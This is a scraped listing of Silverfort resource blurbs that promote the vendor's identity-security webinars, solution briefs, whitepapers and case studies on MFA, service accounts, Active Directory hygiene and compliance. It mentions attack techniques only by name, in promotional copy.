2024-05-21 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/advantages-and-limitations-of-mfa-exploring-common-bypass-techniques-and-security-counter-measures/ One of the most common identity security controls recommended is to implement MFA for at least those with access to valuable data... if not for absolutely everyone in the organization. However, MFA most definitely isn’t a silver bullet. From simple social engineering methods like MFA prompt bombing or proxied logons - to advanced techniques designed to bypass MFA entirely - threat actors are finding ways to leverage compromised credentials despite organizations having MFA in place. So, how is MFA being bypassed and what can you do about it? In this webinar, we explore MFA’s promises, assumptions, and recent failings. Topics covered, include: A look at MFA architecture and various practical ways MFA is implemented today Different ways attackers bypass or avoid MFA protection Controls to gain better visibility into attacker authentication Various ways to improve the state of security around MFA And more --- - Published: 2024-05-01 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/360-mfa-protection-for-ot-environments/ Legacy systems, air-gapped networks, and MFA requirements don’t have to clash. This solution brief introduces how Silverfort delivers true 360° MFA protection for operational technology (OT) environments—without modifying your systems. Industrial organizations are under increasing pressure to comply with standards like NIST, NERC-CIP, and IEC-62443, but legacy systems often block the path to compliance. Silverfort solves this challenge with a non-intrusive solution that extends MFA to any resource authenticating via Active Directory—even those that never supported it. Whether you’re managing HMI consoles, engineering workstations, or file shares, you’ll gain real-time risk-based protection across your OT infrastructure. It’s everything you need to close compliance gaps, secure AD-connected OT environments, and protect even the “unprotectable. ” In this PDF, you’ll learn how to: Enforce MFA on legacy OT systems without rewriting code or disrupting operations. Gain real-time protection against identity-based threats like credential abuse and lateral movement. Comply with industry standards using scalable MFA enforcement. Download the PDF now and see how Silverfort makes industrial-grade identity security practical—and powerful—for OT environments. --- - Published: 2024-04-30 - Modified: 2025-05-07 - URL: https://www.silverfort.com/resources/solving-educations-key-identity-protection-challenges/ The education sector is an increasingly lucrative target for ransomware and data breaches. Attack volume increased by 179% in 2023, with most attacks involving ransomware operations. Without proper security controls, educational organizations are exposed to significant security challenges, especially against identity-based attacks that utilize compromised credentials. Silverfort enables educational institutions to overcome common identity protection challenges by protecting their identity attack surface and providing real-time protection against ransomware attacks. Download this solution brief to learn: What makes educational institutions a key target for identity threats How Silverfort solves identity security challenges in the education sector --- - Published: 2024-04-30 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/five-ways-to-step-up-your-ad-hygiene-with-silverfort/ Keep your Active Directory clean, secure, and attack-resilient Your Active Directory (AD) is a goldmine for attackers, and one weak link can open the door to serious breaches. That’s why maintaining strong AD hygiene should be a critical pillar of your cybersecurity strategy. In this quick guide, 5 Ways to Step Up Your AD Hygiene with Silverfort, we walk you through practical, real-world strategies to close security gaps and proactively harden your AD environment. From identifying hidden threats like shadow admins to eliminating legacy protocols and overlooked misconfigurations, we'll run through actionable insights backed by real customer success stories. Whether you're tackling legacy risks or modern threats, this guide shows you how Silverfort helps you detect, monitor, and respond—without disrupting business operations. No guesswork. No heavy lifting. Just better AD security. In this guide, you’ll learn how to: Uncover hidden admin accounts (aka shadow admins) and misconfigurations that could silently expand your attack surface. Identify and eliminate risky practices, such as NTLMv1 usage and stale service accounts that go undetected in native tools. Defend against stealthy identity-based attacks, like Kerberoasting and Print Spooler exploits, before they escalate. If your AD is at the heart of your network (and let’s face it, it probably is), this is your blueprint for keeping it lean, clean, and secure. --- - Published: 2024-04-22 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/todays-top-4-identity-security-threat-exposures-are-you-vulnerable/ When it comes to identity protection, we often focus on what's visible above the surface – the user accounts and configurations we're familiar with. Armed with this understanding, we can develop and deploy defenses against identity threats. Yet, beneath this familiar landscape lies a concealed realm of Identity Threat Exposures (ITEs). These underground vulnerabilities encompass misconfigurations, forgotten user accounts, legacy settings, malpractices, and insecure built-in features. Serving as insider collaborators for attackers, ITEs provide a convenient pathway to access credentials, escalate privileges, and maneuver laterally, whether on-premises or in the cloud. This webinar sheds light on findings from a report by Silverfort, illuminating the most critical identity security weaknesses within the hybrid enterprise environment. Our objective is to empower security teams with actionable insights derived from this webinar, enabling them to identify and address crucial weaknesses effectively. Key topics covered include: The top four identity security threat exposures today and their repercussions How shadow admins facilitate attackers in compromising the SaaS environment Vulnerabilities associated with service accounts and strategies for mitigation Recommendations for bridging the gap in identity security weaknesses And more --- - Published: 2024-04-14 - Modified: 2025-03-11 - URL: https://www.silverfort.com/resources/the-silverfort-identity-ir-playbook/ An organization’s Incident Response Plan (IRP) is the set of processes followed by security teams to respond to an attack. It usually includes detecting the attack’s scope, containing it to prevent further spread, and eradicating adversarial presence and activities. While there’s an established IR playbook to handle the malware and network aspects of cyberattacks, the identity aspect is lacking. There are no common procedures to identify compromised user accounts and prevent attackers from using them to spread within the targeted environment rapidly and efficiently. Download this eBook to learn: What is the identity aspect of incident response Silverfort’s playbook for identity IR success How to implement Silverfort’s IR playbook during active security incidents --- - Published: 2024-04-08 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/solving-identity-protection-gaps-in-education-environments/ The education sector, including both K-12 and higher education, continues to be a high target for cyberattacks. Attack volume has increased by 179% in 2023 over the previous year, with the majority of attacks consisting of ransomware operations. Ransomware attacks use compromised credentials to spread throughout target environments. The continued success of this mode of operation highlights critical weaknesses in education organizations’ security architecture. Download this eBook to learn: The different identity protection challenges that educational institutes encounter Why traditional identity solutions are ineffective for defending against identity threats How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2024-03-26 - Modified: 2025-07-17 - URL: https://www.silverfort.com/resources/the-identity-threat-exposures-report/ Your defenses are sky high, but underground you’re exposed.   When it comes to identity protection, the user accounts and configurations we’re aware of lie in full view above the ground. We can, therefore, defend them effectively against identity threats. Unfortunately, this aboveground knowledge is painfully limited. Beneath the known identity attack surface exists an underground world of misconfigurations, forgotten user accounts, legacy settings, malpractices, and insecure built-in features. In this report we refer to these as Identity Threat Exposures (ITEs). Attackers use these ITEs as co-conspirators to perform credential theft, privilege escalation and lateral movement. What’s more, due to the common practice of syncing AD user accounts to the cloud IdP, this underground exposure could also provide attackers with direct access to your SaaS environment. We took a deep dive into the prevalence and severity of ITEs in hundreds of live production environments – and this is what we discovered: 67% of organizations exposed their SaaS apps to compromise with insecure on-prem password sync. 37% of admins authenticate in NTLM, enabling attackers to access cleartext passwords. 109 new shadow admins are, on average, introduced by a single AD misconfiguration, enabling attackers to reset a true admin’s password. 31% of all users are service accounts with high access privileges and low visibility. --- - Published: 2024-03-19 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/securing-service-accounts-with-silverfort/ Watch this short video about Unified Identity Protection with Silverfort. Discover, monitor and protect service accounts with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation. --- - Published: 2024-03-12 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/silverforts-deny-access-policies/ Stop threats before they can start with deny access policies that actually work When it comes to identity threats, speed matters. The ability to automatically block access—right as it happens—is one of the most effective defenses against compromised credentials, misconfigurations, and malicious behavior. That’s exactly what Silverfort’s Deny Access Policies deliver. This solution brief shows how Silverfort gives organizations real-time, precision control over access across all users, devices, protocols, and environments. Whether it’s a suspicious NTLMv1 login attempt or an unauthorized user accessing from an insecure location, Silverfort can shut it down before damage is done. You’ll also learn how easy it is to define and enforce policies based on your conditions, like risk level, user privilege, time of day, or device hygiene, without any custom scripts or complex integrations. In this guide, you’ll learn how to: Block risky authentication attempts (like NTLMv1) automatically to neutralize known attack techniques. Segment access by role, protocol, or context, denying connections from high-risk locations or non-compliant devices. Contain threats proactively by enforcing real-time deny policies—even for privileged users and service accounts. --- - Published: 2024-03-11 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/breaking-through-mfa-barriers-in-oil-gas-air-gapped-networks/ Today’s interconnected world has made the cybersecurity landscape increasingly complex, particularly for industries such as oil and gas. Ransomware attacks have increased in frequency in this sector, causing serious concerns about the security of their operational technology (OT) networks. Silverfort helps oil and gas organizations protect their identity attack surface by mitigating ransomware risk and extending MFA protection to all resources in their IT and OT environments. Download this solution brief to learn: What makes oil & gas companies a key target for identity threats How air-gapped networks can be exposed to ransomware How Silverfort solves oil & gas identity security challenges --- - Published: 2024-03-01 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/building-an-incident-response-playbook-against-scattered-spider-in-real-time/ In late 2023, the Scattered Spider threat group attacked the networks of several major financial and insurance entities, resulting in the largest and possibly the most impactful ransomware attack in recent memory. By gaining access to these networks through social engineering, the group bypassed multi-factor authentication (MFA) by attaining login credentials and one-time passwords. Silverfort's threat research team has interacted closely with the identity threats used by Scattered Spider and in fact built a response playbook in real time to respond to an active Scattered Spider attack. This webinar dissects the real-life scenario in which they were called upon to build and execute a response plan while attackers were moving inside an organization's hybrid environment. Topics covered, include: Analysis of the Scattered Spider attack The steps taken in real-time by Silverfort to stop all lateral movement by Scattered Spider Why identity threat IR tools and practices are more critical than ever And more --- - Published: 2024-02-29 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/how-silverfort-secures-former-employee-accounts/ Many organizations spend a lot of time onboarding new employees and making sure they have access to everything they need; however, the same care is often lacking when it comes to offboarding. Unfortunately, attackers are known to compromise unmonitored leaver accounts, opening organizations up to significant risk.   Download this solution brief to learn: Which risks are opened up by ex-employee accounts and stale users How to gain complete visibility into all stale users How to use Silverfort policies to protect your organization against compromised leaver accounts. --- - Published: 2024-02-16 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/identity-protection-for-ny-dfs-part-500/ In this white paper, we explore how Silverfort enables organizations that are subject to NY-DFS cybersecurity regulation to fully meet its MFA and privileged access management requirements, as well as the identity aspect of threat detection and response. Download this whitepaper to learn: About the NY-DFS Part 500 How compliance with NY-DFS Part 500 can significantly strengthen your organization’s security posture How Silverfort can enable compliance quickly and easily --- - Published: 2024-02-16 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/pci-dss-v4-compliance-with-silverfort-identity-protection/ Get PCI DSS v4. 0 ready—faster, smarter, and without the headache PCI DSS 3. 2. 1 is officially retired, and version 4. 0 is now the new standard for safeguarding cardholder data. If your organization needs to meet the latest requirements (and fast), this whitepaper is for you. We'll break down how Silverfort helps you meet key controls with less complexity—especially when it comes to identity and access management. In this whitepaper, you’ll discover how to: Meet updated MFA and password requirements with advanced protection for on-prem, remote, and legacy access—all without disrupting users. Simplify access reviews by continuously monitoring all authentications across human, service, and third-party accounts. Harden your environment with least-privilege enforcement, detection of credential abuse, and real-time blocking of lateral movement. Easily comply with PCI DSS v4. 0's identity security requirements. --- - Published: 2024-02-16 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/comply-with-digital-operational-resilience-act-requirements-with-silverfort/ Make DORA compliance simple and secure with Silverfort Financial institutions and critical ICT providers across the EU must now meet new, rigorous cybersecurity standards. This solution brief breaks down what DORA demands—and shows how Silverfort helps you meet those requirements efficiently, effectively, and with minimal disruption. From identity asset discovery to strong authentication, activity monitoring, and access control, Silverfort provides out-of-the-box alignment with key DORA articles, including Articles 8, 9, and 10. You’ll also find a helpful compliance table mapping specific DORA requirements to Silverfort’s capabilities. If you’re preparing for DORA—or just want to strengthen your IT risk posture—this guide is a must-read. In this PDF, you’ll learn how to: Map and monitor all identities and systems to meet Article 8’s visibility and risk assessment mandates. Enforce access controls and MFA across legacy, on-prem, and cloud environments in line with Article 9. Detect anomalous activity in real time and meet continuous monitoring expectations under Article 10. Download the PDF to see how Silverfort simplifies DORA compliance without slowing down your business. --- - Published: 2024-02-16 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/comply-with-ccop-identity-protection-requirements-with-silverfort/ In this solution brief, we explore how Silverfort enables operators of critical infrastructure in Singapore to align with the updated requirements of CCOP across MFA, privileged access, account management and Domain Controller protection. Download this solution brief to learn: About the Cybersecurity Code of Practice (CCOP) for Critical Information Infrastructure 2. 0 How to gain full coverage of CCOP identity protection requirements --- - Published: 2024-02-15 - Modified: 2025-05-12 - URL: https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges/ As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But brand recognition is a double-edged sword when it comes to cybersecurity, because the bigger your name, the bigger the cyber target on your back. Silverfort enables retailers to overcome common identity protection challenges by mitigating ransomware risk, gaining visibility across all users and service account activity, and extending MFA protection to all resources. Download this solution brief to learn: Why retailers are a key target for identity threats How Silverfort solves key retail identity protection challenges --- - Published: 2024-02-14 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/identity-attack-surface-key-weakness-analysis-redux-shifting-from-on-prem-to-cloud/ It’s no surprise that modern cyberattacks are looking for ways to move laterally both within an on-premises environment, as well as over to an organization’s cloud-based services, applications, and resources. With most every environment leveraging some form of hybrid configuration, any identity credentials that are susceptible to hacking techniques provide an attacker with potentially unfettered access to both the cloud and on-prem environment. And why is it so easy for an elevated identity to be compromised? Weaknesses in your identity configuration, management, and monitoring are likely the cause. Think beyond just an insecure password – undocumented or forgotten accounts, permissions, and delegations; a lack of additional authentication factors; standing privileges; and more, all plague most organizations (because we’re all so focused on dealing with the “next” issue). It’s these weaknesses that cybercriminals look for and take advantage of... all because they know you haven’t addressed them. In this webinar, Yiftach Keshet, VP of Product Marketing at Silverfort, takes a deeper dive into the common identity security gaps that exist in on-premises environments that enable threat actors to also access SaaS-based applications and platforms. Up first, 4-time Microsoft MVP Nick Cavalancia discusses why identity continues to be a primary attack surface, using the MITRE ATT&CK Framework to demonstrate how nearly every action taken inevitably traces back to a weak identity attack surface. Up next, Yiftach dives into the most common security gaps, and showing how they can be used to provide access to on-prem and cloud environments alike. These include: How adversaries abuse on-prem weaknesses to laterally move to and compromise the cloud environment by gaining initial access to a machine, and then use either an NTLM path or Kerberos path to gain access to cloud environments. Identify users with excessive access privileges: 1 out of 7 users (on average) has access privileges similar to those of admins despite not being included in a any admin group. Naturally there's also no protection for these users as no one knows that they are de-facto privileged. Attackers can take their chance and target these users for “under the radar” lateral movement. Stale accounts and shared accounts: common malpractice that creates a huge attack surface. Stale accounts are not protected (more than 15% of all users in many cases). Shared accounts can't be protected with MFA. Both types are extensively targeted. Yiftach also demonstrates how it’s possible to detect these types of attacks, as well as discuss best practices of how to mitigate identity weaknesses through security controls that include multi-factor authentication and identity segmentation. --- - Published: 2024-02-13 - Modified: 2025-05-27 - URL: https://www.silverfort.com/resources/identity-protection-in-healthcare-challenges-and-solutions/ Identity threats are frequently targeted at healthcare organizations, resulting in serious injuries and disruptions to emergency services. Silverfort provides unified identity protection for healthcare with full visibility into service accounts, MFA for all medical devices and information systems, and custom access policies. Download this solution brief to learn: Why healthcare organizations face so many identity threats How Silverfort identifies and manages service accounts and extends MFA to all healthcare systems How to detect and respond to identity threats in real time --- - Published: 2024-02-13 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/westminster-school-with-data3/ Westminster School finds “missing piece” of security strategy with Data#3 and Silverfort Westminster School counts cyber security among the most critical responsibilities of its IT department. The school wanted to minimise risk exposure by strengthening protection around legacy applications and systems. After their IT leaders attended a cyber security session at Data#3’s annual JuiceIT event, they realised they had found the ‘missing piece’ to secure their environment. In this case study you’ll learn: How Westminster School worked with Data#3 and Silverfort to secure their environment How they achieve full visibility of privileged and service accounts How they extended MFA to legacy systems How they significantly improved their cybersecurity maturity and posture --- - Published: 2024-01-17 - Modified: 2025-05-19 - URL: https://www.silverfort.com/resources/state-of-emergency-identity-security-blind-spots-endanger-healthcare-services/ Healthcare organizations are among the most targeted sectors for identity-related attacks as they utilize a wide range of systems and employ different security practices for each. Healthcare organizations are currently faced with very complex identity infrastructures, little to no visibility into their large numbers of service accounts, and a lack of ability to protect their legacy systems and medical devices. In this eBook, you'll learn: Why healthcare organizations are unable to find effective solutions to protect themselves against identity-related attacks. What the current approaches are and why they are highly limited. How to identify, monitor, and protect all resources within the complex environment of healthcare organizations, including user accounts, service accounts and legacy devices. --- - Published: 2024-01-15 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-for-pingone-davinci/ Want to instantly act on identity threats—without writing a single line of code? This PDF introduces the powerful integration between Silverfort and PingOne DaVinci, Ping Identity’s no-code orchestration platform. Together, they let you automatically detect and respond to identity-based attacks—like lateral movement, account takeovers, and brute force—in real time. With Silverfort’s identity risk engine feeding into your DaVinci workflows, you can build automated flows that adapt based on user risk levels, trigger MFA, and initiate webhooks for critical responses. It’s a smarter way to turn identity data into real-time protection, all within a visual interface your teams already use. Whether you're securing complex hybrid environments or simplifying SOC operations, this integration makes identity protection dynamic, responsive, and intuitive. In this PDF, you’ll learn how to: Ingest real-time risk signals from Silverfort into DaVinci and use them to drive automated identity workflows. Trigger precise security actions like MFA challenges or webhook alerts based on live authentication risk. Gain full visibility and context into every access attempt across cloud and on-prem identities—all in one place. Download the PDF now to see how Silverfort and PingOne DaVinci transform identity protection from passive to proactive. --- - Published: 2024-01-04 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/frequently-asked-questions-about-silverfort-and-azure-marketplace/ Purchasing Silverfort through the Azure Marketplace allows for a streamlined procurement process, allowing you to leverage your existing procurement relationship with Microsoft.  Download this solution brief to learn:  The benefits of purchasing Silverfort via the Azure Marketplace All you need to know about the Microsoft Azure Consumption Commitment (MACC) How to know if your company has MACC --- - Published: 2024-01-04 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-servicenow-integration/ What if your service accounts could protect themselves—without system changes or manual oversight? This PDF explains how Silverfort’s native integration with ServiceNow makes that possible. By syncing data from ServiceNow’s CMDB, Silverfort automatically discovers, monitors, and protects every service account across your hybrid environment. It applies risk-based access policies to each account—without system changes. Silverfort continuously analyzes behavior, detects anomalies, and blocks suspicious activity—closing one of the most overlooked attack vectors in the enterprise: compromised service accounts. If you’re struggling with service account sprawl, orphaned credentials, or inconsistent governance, this integration offers a fully automated, intelligent solution. In this PDF, you’ll learn how to: Automatically discover and protect all service accounts managed through ServiceNow. Enforce adaptive access policies that block suspicious activity based on behavioral deviations. Deploy without disruption, using protection that doesn’t require app modification or password rotation. Download the PDF now to see how Silverfort and ServiceNow deliver effortless security for the accounts no one’s watching—but attackers love to exploit. --- - Published: 2023-12-21 - Modified: 2025-05-27 - URL: https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa-2/ Manufacturers are more connected than ever, with a rapidly increasing number of manufacturing environments shifting from local user access to HMI, engineering workstations, and production apps to centralized SSO via Active Directory (AD). While the productivity advantages of this transition are clear, it also exposes their environments to a wide range of identity threats that leverage the same AD infrastructure for malicious resource access. Download this solution brief to learn: The different identity security risks that manufactures faces Why traditional MFA and other common solutions do not provide the level of protection required How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2023-12-15 - Modified: 2025-08-21 - URL: https://www.silverfort.com/resources/building-an-incident-response-playbook-on-the-fly-against-scattered-spider-lateral-movement/ By now, you’ve likely heard about the largest - and possibly the most impactful - ransomware attack in recent memory when the Scattered Spider threat group attacked the networks of multiple major financial and insurance entities. Gaining access to these networks through social engineering, the group bypassed multi-factor authentication by attaining login credentials and one-time passwords. Silverfort’s threat research team has interacted closely with the identity threats used by Scattered Spider and in fact, built a response playbook in real-time to respond to an active Scattered Spider attack. This webinar - featuring Yaron Kassner, CTO and Co-Founder and Yiftach Keshet, VP of Product Marketing of Silverfort - dissects the real-life scenario in which they were called to build and execute a response plan while attackers were moving inside an organization’s hybrid environment. View this webinar to learn more about: The history of Scattered Spider Aligning Scattered Spider’s actions to the MITRE ATT&CK Framework The steps taken in real-time by Silverfort to stop all lateral movement by Scattered Spider And much more --- - Published: 2023-12-13 - Modified: 2025-07-31 - URL: https://www.silverfort.com/resources/what-is-silverforts-cyber-insurance-assessment/ Struggling to meet identity-related cyber insurance requirements? Silverfort’s free assessment can help you bridge the gap—fast. This whitepaper introduces Silverfort’s Cyber Insurance Identity Assessment, a tool designed to give organizations a clear, actionable view of where they stand when it comes to meeting insurer expectations. It helps you uncover all admin and privileged accounts—even those you don't know about—and provides visibility into service accounts, password hygiene, and suspicious behavior across your identity infrastructure. Whether you're renewing a policy or preparing for your first one, this assessment gives you everything you need to meet MFA requirements, fix identity security gaps, and prevent breaches before they become insurance claims. In this whitepaper, you’ll learn how to: Identify unprotected admin and service accounts and bring them under MFA coverage. Expose hygiene issues like non-expiring passwords, Kerberoasting risk, and legacy protocol use. Spot active identity threats like brute force, lateral movement, and credential misuse. Download the whitepaper now to learn how Silverfort makes identity compliance for cyber insurance simple, fast, and effective, so you can secure your coverage and your environment. --- - Published: 2023-12-10 - Modified: 2025-05-09 - URL: https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus/ In this white paper, you will learn how organisations can integrate the Silverfort Unified Identity Protection platform to comply with the Cyber Essentials and Cyber Essentials Plus certification assessment per its latest update in April 2021. Read this whitepaper to learn: About the Cyber Essentials and Cyber Essentials Plus certifications How compliance with Cyber Essentials can significantly strengthen security posture How Silverfort can enable compliance quickly and easily --- - Published: 2023-12-03 - Modified: 2024-10-03 - URL: https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts/ In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: How real-time protection of service accounts can prevent lateral movement and block ransomware propagation Why service accounts are so difficult to protect. Which approaches currently exist to mitigate this risk and their limitations. How to automatically discover, monitor and protect every service account against malicious access. --- - Published: 2023-11-21 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/exploring-the-critical-blind-spots-of-privileged-access-service-accounts-mfa-in-active-directory/ Privileged access is at the top of the list in every organization’s cybersecurity discussions. With threat actors focusing on credentials to enable initial access and lateral movement, it’s critical that every organization figure out ways to protect accounts with elevated privileges. Most have appropriately turned to Multi-Factor Authentication as the means by which to secure accounts, but there is a blind spot that exists in this strategy where privileges are ample – service accounts. If we’re honest with ourselves, we all know that service accounts – those accounts we’ve all granted some of the highest levels of privileges to – are the least protected when it comes to ensuring they aren’t misused. Passwords are rarely changed, MFA isn’t possible, and yet these accounts have administrative access to entire subsets of your environment. This scenario creates a quandary that needs to be solved. Exactly how much risk is created by privileged service accounts with no MFA in place? And how can you put controls in place to ensure that these accounts aren’t being misused by threat actors? In this webinar, 4-time Microsoft MVP, Nick Cavalancia discusses: The risk of privileged service account access Current attack paths Why MFA can’t be used on service accounts What MITRE says about these kinds of attacks In addition, Yiftach Keshet, Director of Product Marketing from Silverfort discusses what is the service account attack surface and how service accounts have been incorporated in recent high-profile attacks. Topics covered, include: What makes service accounts hard to track, monitor, and protect? What are the built-in gaps in MFA coverage in an AD environment that make it vulnerable to lateral movement? How do the MFA and service account gaps mount up together to form an exposed and intensively targeted attack surface? --- - Published: 2023-11-20 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/securing-networking-devices-with-silverfort/ Routers, switches, and firewalls are the backbone of your infrastructure—and the perfect target for attackers. So why leave them out of your MFA strategy? This PDF shows how Silverfort makes it simple to apply strong MFA protection to all your networking devices through RADIUS authentication. Whether you already have a RADIUS server or you don’t, Silverfort supports both scenarios—giving you full visibility into every access request and the ability to enforce flexible MFA policies using tokens, mobile prompts, or FIDO2 devices. Silverfort strengthens authentication at the device level by applying access policies that respond to real-world risks. And since networking devices are often overlooked yet highly vulnerable, this added layer of protection can stop attackers from moving laterally, hijacking sessions, or disrupting infrastructure. In this PDF, you’ll learn how to: Apply MFA to networking gear like routers, switches, and firewalls—even without modifying them. Use RADIUS-based authentication to enforce secure, centralized access control for infrastructure devices. Simplify deployment and policy enforcement across your environment using your existing identity providers. Download the PDF now to see how Silverfort helps you close a major security gap—before attackers exploit it. --- - Published: 2023-11-17 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/nec-xon-customer-case-study/ Gaining Full Visibility into Authentications and Lateral Movement Prevention NEC XON Systems is a leading African integrator of ICT solutions and part of NEC, a global Japanese firm. As a company that places a high priority on cyber security, NEC XON sought a solution that could give them full visibility into user authentication flows, protect their homegrown apps, and prevent lateral movement attacks. Since deploying Silverfort, they have solved their identity security challenges and have even become a dedicated partner, eager to share Silverfort’s enhanced security benefits with their own clients. In this case study you’ll learn: How NEC XON gained real-time visibility into all access-related activity How they extended MFA protection to homegrown apps in a matter of weeks How they prevent lateral movement attacks with block-only access policies Why they have chosen to partner with Silverfort --- - Published: 2023-11-16 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/solving-identity-protection-gaps-in-telecom-environments/ The telecom industry keeps the world connected. Whether it is private communications or business interactions, it is an integral component of our daily lives, and we take many elements for granted. With the development of technology, the threat landscape of the telecom industry has also changed, causing a surge in cyber-attacks specifically targeting the industry in recent years. Download this eBook to learn: The different identity protection challenges that telecoms face Why traditional MFA and other common solutions fail to deliver the required protection How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2023-11-16 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/how-silverfort-solves-telecom-identity-protection-challenges/ Keeping the world connected is the responsibility of the telecom industry. With the development of technology, the threat landscape of the telecom industry has also changed. This has caused a surge in cyber-attacks specifically targeting this space in recent years. Considering it underpins most of the global critical infrastructure, a successful attack would have a significant and extensive impact. Download this solution brief to learn: The different identity security risks that the telecom industry faces Why traditional MFA and other common solutions do not provide the level of protection required How Silverfort can empower you with end-to-end identity protection across your environments --- - Published: 2023-11-09 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/silverfort-and-microsoft-defender-for-identity/ Stop identity-based attacks in teal time—across all systems—with Silverfort and Microsoft Defender for Identity (MDI). Identity threats don’t stop at cloud boundaries. Your defenses shouldn’t either. This solution brief reveals how the powerful integration between Silverfort and Microsoft Defender for Identity (MDI) brings unmatched real-time detection and prevention of identity threats across your hybrid environment. Together, they not only detect malicious activity like “Pass the Hash” attacks, but block it instantly, even in systems where MFA or modern authentication isn't available. You’ll learn how Silverfort automatically enforces Conditional Access policies across your entire infrastructure—cloud, on-prem, and everything in between—without disrupting users. The result? Fewer false positives, stronger protection, better outcomes If you rely on MDI for threat detection, this guide shows how Silverfort turns that visibility into action. In this PDF, you’ll learn how to: Extend Entra ID Conditional Access to legacy on-prem resources like file shares, servers, and command-line tools. Block lateral movement and account takeover instantly, before attackers can escalate. Enhance zero trust with granular, real-time policy enforcement based on actual user risk. Download the PDF to see how Silverfort and Microsoft work better together, so you can respond to threats without missing a beat. --- - Published: 2023-10-31 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/analysis-of-the-key-weaknesses-and-exposures-in-the-identity-attack-surface-silverfort/ If you’ve been paying attention to cyberattack actions, you already know that privileges are the key to an attacker’s success. But it’s not the privileges where your risk truly lies; it’s in the security revolving around identity. If you have admin with a password of ‘password”, it wasn’t the elevated privileges that did your organization in – it was the credential identity that provided the threat actor with said elevated privileges. And why was it so easy for an elevated identity to be compromised? Weaknesses in your identity configuration, management, and monitoring are likely the cause. In this webinar, Silverfort’s VP of Product Marketing, Yiftach Keshet, joins 4-time Microsoft MVP Nick Cavalancia to discuss why identity is your most important attack surface, using the MITRE ATT&CK Framework to demonstrate how nearly every action taken inevitably traces back to a weak identity attack surface. Other topics covered, include: Common identity security gaps that exist in most environments that may be missed by most security practitioners. The root cause of these gaps and how they are being exploited. How to detect and mitigate identity weaknesses through security controls like MFA and identity segmentation. And more. --- - Published: 2023-10-12 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-yubico/ What if your YubiKeys could protect not just web apps—but every legacy system, database, and command-line tool too? With the Silverfort + Yubico integration, they can. This PDF breaks down how the two platforms work together to deliver hardware-backed, risk-based authentication across your entire IT environment—on-prem and in the cloud. Until now, extending YubiKey MFA to systems like PowerShell, PsExec, RDP, or legacy infrastructure meant costly workarounds or accepting risk. But Silverfort changes that. It analyzes every access request in real time, and when risk is detected, prompts Yubico’s FIDO2-based authentication—no code changes, no compromise. Whether you’re aiming to strengthen Zero Trust, reduce attack surface, or meet compliance requirements, this integration brings passwordless, phishing-resistant protection to the places it’s needed most. In this PDF, you’ll learn how to: Extend YubiKey MFA to legacy, cloud, and on-prem systems that couldn’t be protected before. Trigger authentication based on real-time risk to avoid MFA fatigue while maximizing security. Deliver a consistent MFA experience across all user access points—without friction or disruption. Download the PDF now and discover how Silverfort and Yubico combine for enterprise-wide, zero-compromise identity protection. --- - Published: 2023-10-02 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/silverfort-and-kayak-a-case-study/ In this testimonial, Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled them to extend MFA to on-prem apps and command-line access as well as put real-time protection on service accounts. https://www. youtube. com/watch? v=Af74J6Rmii8 --- - Published: 2023-09-28 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/addressing-telecommunication-security-framework-requirements-for-privileged-accounts/ This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of the Telecommunication Security Framework. Download this whitepaper to learn: What is the Telecommunication Security Framework (TSF)? What parts of TSF does Silverfort address? What protection do mitigations provide? --- - Published: 2023-09-27 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/silverfort-and-huntsville-hospital-a-case-study-2/ In this testimonial, Huntsville Hospital’s Rick Corn, CIO and Ryan Petraszewsky, IT Security Officer discussed how Silverfort helped them to implement real-time protection against identity-based attacks on all critical healthcare operations, including service accounts and applying MFA to all privileged users. https://www. youtube. com/watch? v=amxnV7C6B9s --- - Published: 2023-09-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-bridging-to-entra-id/ What if your legacy apps and on-prem tools could follow the same security policies as your cloud apps? That’s exactly what Silverfort’s Entra ID bridging makes possible. This PDF shows how Silverfort enables organizations to bring modern identity protections—like Conditional Access and MFA—to every system in the enterprise, including those that were never designed for them. Silverfort bridges authentications from Active 